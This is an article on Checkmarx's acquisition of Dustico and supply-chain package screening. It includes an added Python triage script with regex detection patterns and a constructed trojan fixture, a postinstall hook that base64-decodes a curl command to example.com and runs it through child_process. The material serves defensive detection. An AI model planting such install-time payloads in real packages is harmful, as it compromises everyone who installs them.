Checkmarx x Dustico: Developing Safer Supply Chain Software
Open-source software is a double-edged sword: it cuts development costs, but it also adds risk. Building on open-source dependencies can mean pulling hundreds of third-party packages into your build. If even one of those packages hides malicious code, your company, and every client that relies on your software, is exposed to attack.
According to the European Union's (EU) cybersecurity agency, ENISA, supply chain attacks were expected to increase four-fold in 2021 versus 2020. Part of this is because the attackers keep getting better at what they do. Part of it is because companies have moved more of their supply chain systems online with remote work. And recent attacks, such as those on Colonial Pipeline, JBS Foods, and Kaseya, have shown cybercriminals the prize on offer: ransom money, and lots of it.
Where Does Checkmarx Come In?
Founded in Israel, Checkmarx serves clients such as Sony, Visa, and SAP. Its software security tools reduce risk across proprietary code, open-source code, and APIs. Over half of the Fortune 50 use its technology and services to secure software development at scale, which places it among the leaders in supply chain security.
Recently, it acquired Dustico, a machine-learning platform that analyses packages and detects malicious code. To do so, it examines how credible a package's contributors are, how often the package is updated, and how well it is maintained; each gives a hint about whether the package can be trusted.
‘It’s important to evaluate what [your] code does when you run it—and who created it in the first place’, says Robert Haynes, a Software Composition Analysis (SCA) and Open Source Evangelist at Checkmarx. ‘Evaluating what processes [a piece of software] creates, what ports it opens, and what connections it attempts to make are all critical indicators of its intent’.
Dustico’s Features
- Automatically detects abnormal behaviours in code packages
- Checks indicators of compromise (IOCs) to quickly detect a cyberattack
- Collects packages for analysis as soon as they’re published
- Integrates into the Checkmarx platform, so developers using it get a frictionless experience
How Will This Strengthen Supply Chains?
According to Dustico, supply chain attacks often hide malicious code in open-source packages. It warns: ‘Developers must apply a zero-trust security mindset’. Now that Checkmarx is adding Dustico’s analysis engine to its existing Software Composition Analysis tool, CxSCA, it will be able to spot signs of danger earlier. Together, they target ransomware, multi-stage attacks, and Trojan horses, in which malicious code is smuggled in inside an innocuous-looking download.
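As an added illustration of the signals the article describes (the contributor and maintenance metadata Dustico weighs, and the install-time behaviour Haynes lists: processes created, connections attempted, payloads decoded), here is a small Python triage script. It is example code written for this page, not Checkmarx or Dustico code, and it uses static pattern matching over a package's files as a stand-in for the dynamic analysis those tools perform. The npm-style manifests, file contents, the `NOW` timestamp and package names such as `left-pad-utils` are all constructed for the example.

```python
"""Zero-trust triage of a package before it is admitted to a build.

Added example, not Checkmarx or Dustico code. Two signal families are
combined: install-time behaviour (lifecycle hooks plus textual indicators of
process creation, network connections and obfuscated code) and contributor
metadata (package age, bus factor, recent maintainer handover).
"""
import re
from datetime import datetime, timezone

# Textual stand-ins for the behaviours a sandbox would observe at install time.
BEHAVIOUR_PATTERNS = {
    "spawns_process": re.compile(r"child_process|\bexecSync?\(|\bspawn\("),
    "opens_connection": re.compile(r"\bnet\.connect\(|\bhttps?\.(request|get)\(|\bfetch\("),
    "decodes_payload": re.compile(r"['\"]base64['\"]|\batob\("),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "reads_env": re.compile(r"process\.env"),
}
# Behaviours that justify blocking when they run unattended during install.
DANGEROUS = {"spawns_process", "opens_connection", "decodes_payload", "dynamic_eval"}
# npm lifecycle scripts that execute automatically on `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def install_hooks(manifest):
    """Lifecycle scripts from package.json that run during installation."""
    return {k: v for k, v in manifest.get("scripts", {}).items() if k in INSTALL_HOOKS}


def behaviour_indicators(files):
    """Map each file name to the sorted list of behaviour patterns found in it."""
    hits = {}
    for name, text in files.items():
        found = sorted(k for k, rx in BEHAVIOUR_PATTERNS.items() if rx.search(text))
        if found:
            hits[name] = found
    return hits


def maintainer_indicators(manifest, now):
    """Contributor and maintenance heuristics: age, single maintainer, handover."""
    flags = []
    if (now - datetime.fromisoformat(manifest["created"])).days < 30:
        flags.append("younger_than_30_days")
    if len(manifest.get("maintainers", [])) <= 1:
        flags.append("single_maintainer")
    changed = manifest.get("maintainer_changed")
    if changed and (now - datetime.fromisoformat(changed)).days < 30:
        flags.append("maintainer_changed_recently")
    return flags


def triage(manifest, files, now):
    """Return the collected evidence and a verdict: block, review or allow."""
    hooks = install_hooks(manifest)
    behaviour = behaviour_indicators(files)
    meta = maintainer_indicators(manifest, now)
    # Files referenced by an install hook run before anyone reads them.
    hook_files = [f for f in files if any(f in cmd for cmd in hooks.values())]
    if any(DANGEROUS & set(behaviour.get(f, [])) for f in hook_files):
        verdict = "block"      # unattended execution + dangerous behaviour
    elif hooks or behaviour or len(meta) >= 2:
        verdict = "review"     # something a human should look at first
    else:
        verdict = "allow"
    return {"verdict": verdict, "install_hooks": hooks, "behaviour": behaviour, "metadata": meta}


NOW = datetime(2021, 9, 1, tzinfo=timezone.utc)  # constructed reference time

# Constructed trojanised package: brand new, one maintainer, and a postinstall
# script that decodes a payload and hands it to a shell.
TROJAN_MANIFEST = {
    "name": "left-pad-utils",  # hypothetical name
    "scripts": {"postinstall": "node setup.js"},
    "created": "2021-08-25T00:00:00+00:00",
    "maintainers": ["new-user-1"],
}
TROJAN_FILES = {
    "setup.js": ('const cmd = Buffer.from("Y3VybCBodHRwOi8vZXhhbXBsZS5jb20=", "base64").toString();\n'
                 'require("child_process").exec(cmd);\n'),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

# Constructed benign package: mature, two maintainers, no install hooks.
BENIGN_MANIFEST = {
    "name": "tiny-pad",
    "scripts": {"test": "node test.js"},
    "created": "2016-03-01T00:00:00+00:00",
    "maintainers": ["alice", "bob"],
}
BENIGN_FILES = {"index.js": "module.exports = (s, n) => s.padStart(n);\n"}

# Constructed package whose install hook only writes a file: not malicious on
# its face, but it runs unattended, so it is routed to a human.
HOOK_MANIFEST = {
    "name": "fix-perms",
    "scripts": {"postinstall": "node fixup.js"},
    "created": "2019-01-01T00:00:00+00:00",
    "maintainers": ["carol", "dave"],
}
HOOK_FILES = {"fixup.js": 'require("fs").writeFileSync("done", "ok");\n'}

if __name__ == "__main__":
    for manifest, files in ((TROJAN_MANIFEST, TROJAN_FILES),
                            (BENIGN_MANIFEST, BENIGN_FILES),
                            (HOOK_MANIFEST, HOOK_FILES)):
        result = triage(manifest, files, NOW)
        print(manifest["name"], "->", result["verdict"], result)
```

The verdict logic deliberately treats an install hook as the amplifier: the same `child_process` call in a library function that nobody invokes is a review item, but in a script that `npm install` runs unattended it is a block. Regex indicators are easy to evade with string splitting or packing, which is exactly why the article's recommendation is to observe what the package actually does when executed in a sandbox rather than what its source appears to say.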
In short: companies that take cyber risk seriously can reject suspect packages, screen for untrustworthy contributors, and keep wolves in sheep’s clothing out of their systems. But it requires constant vigilance. As Maty Siman, CTO at Checkmarx, concludes: ‘Development teams must operate with the proactive assumption that all code may have been maliciously manipulated’.
In the end, Checkmarx asks: how seriously will you treat supply chain cyber risk?